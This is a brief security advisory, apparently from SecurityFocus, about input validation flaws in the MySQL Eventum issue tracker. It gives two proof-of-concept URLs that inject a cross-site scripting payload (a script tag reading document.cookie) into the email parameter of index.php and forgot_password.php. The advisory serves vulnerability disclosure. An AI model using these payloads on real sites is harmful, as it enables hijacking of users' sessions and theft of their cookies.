MySQL Eventum Multiple Input Validation Vulnerabilities

No exploit is required to leverage any of these issues. The following proof of concepts have been provided:

http://www.example.com/index.php?err=3&email="><script>alert(document.cookie)</script>
http://www.example.com/forgot_password.php?email="><script>alert(document.cookie)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus